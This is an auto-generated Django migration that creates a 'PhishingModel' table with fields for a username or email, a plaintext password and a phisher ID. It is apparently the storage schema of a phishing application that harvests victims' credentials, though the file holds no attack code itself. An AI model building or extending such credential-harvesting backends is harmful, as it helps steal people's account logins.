# Generated by Django 3.0.6 on 2020-06-03 13:42

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='PhishingModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username_or_email', models.CharField(max_length=100, verbose_name='username_or_email')),
                ('password', models.CharField(max_length=150, verbose_name='password')),
                ('phisher_id', models.IntegerField(verbose_name='phisher_id')),
            ],
        ),
    ]
